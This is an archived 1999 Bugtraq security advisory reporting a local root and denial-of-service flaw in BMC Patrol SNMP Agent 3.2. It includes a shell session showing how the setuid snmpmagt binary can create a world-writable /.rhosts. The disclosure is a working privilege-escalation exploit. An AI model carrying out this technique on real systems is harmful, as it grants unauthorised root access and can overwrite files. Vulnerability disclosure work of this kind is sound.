[11021] in bugtraq
Root Perms Gained with Patrol SNMP Agent 3.2 (all others?)
daemon@ATHENA.MIT.EDU (Andrew Alness)
Wed Jul 14 16:02:51 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.GSO.4.10.9907131649001.21258-100000@apollo.gti.net>
Date: Tue, 13 Jul 1999 16:53:27 -0400
Reply-To: Andrew Alness <aalness@GTI.NET>
From: Andrew Alness <aalness@GTI.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Problem in Patrol 3.2
---------------------
vendor:
Copyright 1993-97 BMC Software, Inc.
how bad:
local root/denial of service
example:
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al snmpmagt
-rwsr-xr-x 1 root users 185461 Mar 6 1998 snmpmagt*
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
/.rhosts not found
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> umask 0
(first argument must be either an invalid config file or a file that doesn't exist)
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> snmpmagt yoyoyo /.rhosts
yoyoyo: No such file or directory
snmp bind failure: Address already in use
/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin/snmpmagt: error processing configuration
maheaa@jedi:/opt/patrol/PATROL3.2/HPUX-PA1.1-V10/bin> ls -al /.rhosts
-rw-rw-rw- 1 root users 770 Jul 13 14:42 .rhosts
note: if the file exists it keeps the same perms, otherwise creates it
with perms based on your umask and chown's to whoever owns the parent
directory of the file you're creating. if the file exists it overwrites it
with "i^A" then the result of gethostname() and some whitespace. this
problem is not platform dependent and was tested based on out of box
install on an HP.
- aalness@gti.net
